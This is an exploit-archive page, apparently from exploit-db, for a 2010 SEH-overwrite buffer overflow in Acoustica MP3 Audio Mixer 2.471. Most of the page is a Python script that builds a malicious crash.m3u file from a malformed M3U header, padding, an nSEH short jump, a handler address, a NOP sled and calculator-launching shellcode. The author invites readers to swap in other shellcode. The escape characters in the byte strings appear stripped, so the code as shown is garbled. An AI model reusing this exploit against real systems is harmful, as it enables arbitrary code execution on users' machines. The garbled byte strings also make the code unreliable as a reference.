Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Published : 2010-09-09
# Author : Carlos Mario Penagos Hollmann
# Previous Title : Audiotran 1.4.2.4 SEH Overflow Exploit
# Next Title : x86_64 Linux Kernel ia32syscall Emulation Privilege Escalation

# Exploit Title: Acoustica MP3 Audio Mixer 2.471 Extended M3U directives SEH
# Date: September 8 2010
# Author: Carlos Hollmann 
# Software Link: http://www.acoustica.com/downloading.asp?p=1
# Version: 2.471
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
# CVE : 


#    ________  _    _________   ____ __ _____   ________
#   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
#  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __  
# / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /  
#/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/____/   

# COLOMBIA presents.............
#        PoC from  D3V!L FucK3r http://www.exploit-db.com/exploits/9213/
#
#	Carlos Mario Penagos Hollmann A.K.A Elvenking  shogilord@gmail.com
#	Extended M3U directives

# 	Background from http://hanna.pyxidis.org/tech/m3u.html


 
#	The software doesn't  handle correctly M3U's header and extra info when is being imported on a open sound group.
# 	Trigger: launch app, open an existing sound group i.e(C:Program FilesAcoustica MP3 Audio Mixerexample.sgp) then import the crash.m3u and....KaaaaBooom!!
#
#     
#     Greetings: My Family, Algeria-->sud0 Australia--> tecr0c,Peru-->fataku,Spain-->Alberto Hervalejo, OFFSEC TEAM and all my friends in Colombia 
#	!!! PAZ PARA MI PAIS PAZ PARA COLOMBIA !!! Freedom!!
	



# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# I do not want anyone to use this script
# for malicious and/or illegal purposes
# I cannot be held responsible for any illegal use.
 
# Note : you are not allowed to edit/modify this code. 
# If you do, I will not be held responsible for any damages this may cause.

#!/usr/bin/python


magic 	= "crash.m3u"


vuln 	= "x23x0Dx0Ax23x0Dx0A" # Extended M3U, no EXTM3U, no EXTINFO , can change OD for any  value x1b,x0a.........


junk 		=	"x41" * 816
ds_eax 		=	"x25x25x47x7E" #First Call ds:[eax+8], Writeable memory address to put in EAX
morejunk 	=	"x42" * 8308
nSEH 		=	"xEBx06x90x90" #short jmp 6 bytes 
SEH 		=	"x3Fx28xD1x72"#SEH Handler
nops 		=	"x90" * 10 #landing padd
shellcode	=	"x8bxecx55x8bxecx68x20x20x20x2fx68x63x61x6cx63x8dx45xf8x50xb8xc7x93xc2x77xffxd0" # Thanks  sud0, any other shell works too  just remove "x00x0a"
payload	=	vuln+junk+ds_eax+morejunk+nSEH+SEH+nops+shellcode

file = open(magic , 'w')
file.write(payload)
file.close()